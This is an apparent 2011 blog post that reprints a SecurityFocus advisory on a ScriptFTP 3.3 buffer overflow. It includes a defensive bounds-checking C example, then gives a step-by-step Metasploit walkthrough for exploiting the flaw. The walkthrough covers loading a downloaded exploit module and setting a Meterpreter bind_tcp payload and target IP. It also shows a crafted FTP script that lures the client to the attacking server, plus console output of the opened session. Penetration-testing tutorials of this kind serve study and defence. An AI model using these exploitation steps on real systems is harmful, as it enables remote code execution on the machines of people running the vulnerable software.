Sunday 9 October 2011

AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability

Class: Boundary Condition Error
CVE:
Remote: Yes
Local: No
Published: Sep 20 2011 12:00AM
Updated: Sep 30 2011 07:00AM
Credit: Tom Gregory
Vulnerable: AmmSoft ScriptFTP 3.3
URL: http://www.securityfocus.com/bid/49707
Description: ScriptFTP is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition. ScriptFTP 3.3 is vulnerable; other versions may also be affected.
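The advisory says the client fails to bound-check data it receives. The snippet below is an added illustration of the check that is missing, written for this page and not taken from ScriptFTP or the advisory: it parses a LIST reply received over the data connection into fixed-size slots and refuses any line that would not fit instead of copying it. LINE_MAX, MAX_ENTRIES and the sample listing are assumptions constructed here.

```c
#include <string.h>
#define LINE_MAX 128     /* assumed per-line bound; ScriptFTP's real buffer sizes are not known */
#define MAX_ENTRIES 16

struct listing {
    char entry[MAX_ENTRIES][LINE_MAX];
    size_t count;        /* lines accepted */
    size_t rejected;     /* lines dropped because they would not fit */
};
/* Split raw LIST data from the data connection on LF (CRLF tolerated) and copy each
 * line into a fixed slot. A line of LINE_MAX bytes or more is counted and dropped,
 * never copied: that check is what an unbounded copy lacks. Returns lines accepted. */
size_t parse_listing(const char *data, size_t len, struct listing *out)
{
    size_t start = 0;
    memset(out, 0, sizeof *out);
    for (size_t i = 0; i <= len; i++) {
        if (i < len && data[i] != '\n')
            continue;                             /* not at end of a line yet */
        size_t n = i - start;
        if (n > 0 && data[start + n - 1] == '\r')
            n--;                                  /* strip CR of CRLF */
        if (n >= LINE_MAX || (n > 0 && out->count >= MAX_ENTRIES)) {
            out->rejected++;                      /* no room: never copy */
        } else if (n > 0) {
            memcpy(out->entry[out->count], data + start, n);
            out->entry[out->count][n] = '\0';
            out->count++;
        }
        start = i + 1;
    }
    return out->count;
}
/* Constructed sample: one benign entry, then junk_len bytes of 'A' (clamped to 900), the
 * shape of listing a hostile server could return to GETLIST. Returns accepted * 100 +
 * rejected, so 200 means both lines fit and 101 means the long one was dropped. */
size_t demo_listing(size_t junk_len)
{
    char buf[1024];
    const char *good = "-rw-r--r-- 1 ftp ftp 12 Sep 20 2011 notes.txt\r\n";
    size_t pos = strlen(good);
    struct listing l;
    if (junk_len > 900) junk_len = 900;
    memcpy(buf, good, pos);
    memset(buf + pos, 'A', junk_len); pos += junk_len;
    buf[pos++] = '\r'; buf[pos++] = '\n';
    parse_listing(buf, pos, &l);
    return l.count * 100 + l.rejected;
}
```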

In order to exploit this you can use either the Python or the Metasploit exploit; I prefer the Metasploit one because of the payloads. So the first thing you need to do is put the exploit under the folder /pentest/exploits/framework3/modules/exploits/windows. I called mine scriptftp33.rb; just paste in the content of
http://www.securityfocus.com/data/vulnerabilities/exploits/49707.rb

Now, step by step:
1) msfconsole
2) use windows/ftp/scriptftp33 (to use the exploit we just created)
3) set PAYLOAD windows/meterpreter/bind_tcp (to use Meterpreter as our payload)
4) set RHOST 172.16.1.7 (this is the IP address of the server that I am attacking)
5) exploit

OK, now the attacking server side is ready to go. Next you need to download ScriptFTP from
http://www.scriptftp.com/ScriptFTP_3_3_setup.exe and install it.
Open ScriptFTP and create a script with the following content:

OPENHOST("172.16.1.79","ftptest","passwordtest")
SETPASSIVE(ENABLED)
GETLIST($list,REMOTE_FILES)
CLOSEHOST

172.16.1.79 = the IP address of the attacking server
ftptest = username
passwordtest = password
Remember to create this user on your attacking server.
Save it as exploit.ftp
Now click Open and select exploit.ftp
If everything goes all right, in your Metasploit console you should now see something like this:
msf exploit(scriptftp33) > [*] 172.16.1.7:1518 LOGIN ftptest / passwordtest
[*] - Data connection set up
[*] - Sending directory list via data connection
[*] Sending stage (752128 bytes) to 172.16.1.7
[*] Meterpreter session 1 opened (172.16.1.79:37594 -> 172.16.1.7:4444) at 2011-09-30 10:15:21 +0100

Right, now you have your Meterpreter session; just type "sessions -i 1" and you can do everything you want ;)

That's it guys.
